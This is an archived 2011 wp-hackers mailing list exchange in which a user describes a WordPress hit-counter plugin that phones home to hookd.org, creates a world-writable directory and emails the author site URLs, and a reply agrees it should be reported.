[wp-hackers] Hookd? Sketchy Plugin Include
Mika A Epstein
ipstenu at ipstenu.org
Tue Sep 13 23:29:49 UTC 2011
Well the emailing the author info without asking for it first is a flat out no-no (and should be reported to plugins at wordpress.org).
Mika A Epstein (aka Ipstenu)
On 13 Sep 2011, at 5:28:01PM, Jackson Whelan wrote:
> Trying to help someone in the forums complaining about a plugin (http://wordpress.org/extend/plugins/hit-counter-ultimate/) causing their site to crawl, and stumbled across this included file which looks like it could be used for great malfeasance.
> Makes calls to hookd.org and requests actions and filters to be added. Creates a world-writable directory while it's at it as well.
> Is anyone familiar with hookd.org? Am I paranoid for thinking this is dubious?
> As a bonus the plugin emails the author with the URL of the site it was activated on, with no user consent or knowledge.
> Which would make sense as it would allow them to fine tune the junk they deploy.
> I found this related post in the forums from a year ago.
> I've already emailed plugins at wordpress.org, but thought I'd ask if anyone here was aware of this.
> No comment on hit counters being used in 2011, but if you'd like to step into the wayback machine just look at the screenshots : )
> Thanks! Jackson
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
More information about the wp-hackers